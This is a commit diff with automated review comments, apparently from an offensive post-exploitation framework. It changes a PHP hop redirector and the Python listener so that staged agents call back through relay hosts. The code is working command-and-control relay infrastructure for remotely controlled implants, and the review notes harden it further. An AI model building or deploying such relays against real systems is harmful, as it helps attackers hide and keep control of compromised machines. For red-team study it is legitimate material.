Fix agent staging over http_hop listeners.

Fixes issue #370.
mdns
mr64bit 2016-11-28 11:54:57 -05:00
parent 619ae2c132
commit 6c3f51aca9
3 changed files with 35 additions and 6 deletions


@ -1,18 +1,22 @@
<?php <?php
$server = rtrim("REPLACE_SERVER", '/'); $server = rtrim("REPLACE_SERVER", '/');
$hopName = "REPLACE_HOP_NAME";
function do_get_request($url, $optionalHeaders = null) function do_get_request($url, $optionalHeaders = null)
{ {
global $hopName;
$aContext = array( $aContext = array(
'http' => array( 'http' => array(
'method' => 'GET' 'method' => 'GET'
), ),
); );
$headers = array('Hop-Name' => $hopName);
if ($optionalHeaders !== null) { if ($optionalHeaders !== null) {
$aContext['http']['header'] = $optionalHeaders; $headers['Cookie'] = $optionalHeaders;
} }
$aContext['http']['header'] = prepareHeaders($headers);
$cxContext = stream_context_create($aContext); $cxContext = stream_context_create($aContext);
echo file_get_contents($url, False, $cxContext); echo file_get_contents($url, False, $cxContext);
} }
@ -20,13 +24,16 @@ function do_get_request($url, $optionalHeaders = null)
function do_post_request($url, $data, $optionalHeaders = null) function do_post_request($url, $data, $optionalHeaders = null)
{ {
global $hopName;
$params = array('http' => array( $params = array('http' => array(
'method' => 'POST', 'method' => 'POST',
'content' => $data 'content' => $data
)); ));
$headers = array('Hop-Name' => $hopName);
if ($optionalHeaders !== null) { if ($optionalHeaders !== null) {
$params['http']['header'] = $optionalHeaders; $headers['Cookie'] = $optionalHeaders;
} }
$params['http']['header'] = prepareHeaders($headers);
$ctx = stream_context_create($params); $ctx = stream_context_create($params);
$fp = @fopen($url, 'rb', false, $ctx); $fp = @fopen($url, 'rb', false, $ctx);
if (!$fp) { if (!$fp) {
@ -39,11 +46,24 @@ function do_post_request($url, $data, $optionalHeaders = null)
echo $response; echo $response;
} }
function prepareHeaders($headers) {
$flattened = array();
foreach ($headers as $key => $header) {
if (is_int($key)) {
$flattened[] = $header;
} else {
$flattened[] = $key.': '.$header;
}
}
return implode("\r\n", $flattened);
}
if ($_SERVER['REQUEST_METHOD'] === 'GET') { if ($_SERVER['REQUEST_METHOD'] === 'GET') {
$requestURI = $_SERVER['REQUEST_URI']; $requestURI = $_SERVER['REQUEST_URI'];
if(isset($_COOKIE['session'])) { if(isset($_COOKIE['session'])) {
return do_get_request($server.$requestURI, "Cookie: session=".str_replace(' ', '+', $_COOKIE['session'])); return do_get_request($server.$requestURI, "session=".str_replace(' ', '+', $_COOKIE['session']));
} }
else { else {
return do_get_request($server.$requestURI); return do_get_request($server.$requestURI);
@ -56,7 +76,7 @@ else {
$postdata = file_get_contents("php://input"); $postdata = file_get_contents("php://input");
if(isset($_COOKIE['session'])) { if(isset($_COOKIE['session'])) {
return do_post_request($server.$requestURI, $postdata, "Cookie: session=".str_replace(' ', '+', $_COOKIE['session'])); return do_post_request($server.$requestURI, $postdata, "session=".str_replace(' ', '+', $_COOKIE['session']));
} }
else { else {
return do_post_request($server.$requestURI, $postdata); return do_post_request($server.$requestURI, $postdata);
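Review bot: `prepareHeaders` concatenates each value straight into the header block and joins with `"\r\n"`, and nothing in the new code rejects line breaks in a value; the Cookie value reaches it from `$_COOKIE['session']` at the two call sites after only a space-to-plus substitution, so a CR or LF surviving in that cookie would become an additional header line in the upstream request. A minimal guard is `$flattened[] = $key.': '.str_replace(["\r", "\n"], '', $header);` with the same treatment in the integer-keyed branch. Separately, `prepareHeaders` puts its opening brace on the signature line while `do_get_request` and `do_post_request` put it on the next line, and a short docblock stating that integer keys are emitted verbatim and string keys as `Name: value` would help, since the helper is defined after both places that call it. The `$optionalHeaders` parameter now only ever receives a cookie string, so its name no longer describes what it carries.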


@ -747,8 +747,16 @@ def send_message(packets=None):
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey'] sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http') dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py # step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions) agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode) encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet? # TODO: wrap ^ in a routing packet?
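Review bot: The `except TypeError` around the new hop lookup covers four statements, so it also swallows a TypeError raised by `copy.deepcopy` or by a listener entry whose `Host` value has an unexpected shape, while a `KeyError` (listener found but without a `Host` key) is not caught at all and would abort the stage-2 response. The catch appears to rely on `helpers.get_listener_options` returning None for an unknown or absent name; if so, an explicit check on the return value is both narrower and clearer. `copy` is used here but its import, like the rest of the enclosing function, lies outside the hunk, so confirm it is present. Logging which hop listener's Host was substituted next to the existing `dispatcher.send` line would also make staging problems easier to trace.
```python
hopListenerName = request.headers.get('Hop-Name')
hopListener = helpers.get_listener_options(hopListenerName) if hopListenerName else None
if hopListener and 'Host' in hopListener:
    tempListenerOptions = copy.deepcopy(listenerOptions)
    tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
else:
    tempListenerOptions = listenerOptions
# … unchanged: generate_agent / encryption calls …
```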


@ -440,6 +440,7 @@ def send_message(packets=None):
f.close() f.close()
hopCode = hopCode.replace('REPLACE_SERVER', redirectHost) hopCode = hopCode.replace('REPLACE_SERVER', redirectHost)
hopCode = hopCode.replace('REPLACE_HOP_NAME', self.options['Name']['Value'])
saveFolder = self.options['OutFolder']['Value'] saveFolder = self.options['OutFolder']['Value']
for uri in uris: for uri in uris:
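Review bot: The listener name is spliced into a PHP double-quoted string literal (`$hopName = "REPLACE_HOP_NAME";` in the hop template) without any escaping, so a name containing `"`, `\` or `$` would yield a hop file that is syntactically broken or that interpolates unexpectedly. Either escape those characters before substituting, e.g. `hopName = self.options['Name']['Value'].replace('\\', '\\\\').replace('"', '\\"').replace('$', '\\$')` followed by `hopCode = hopCode.replace('REPLACE_HOP_NAME', hopName)`, or reject such names when the option is set. The enclosing function begins and ends outside this hunk.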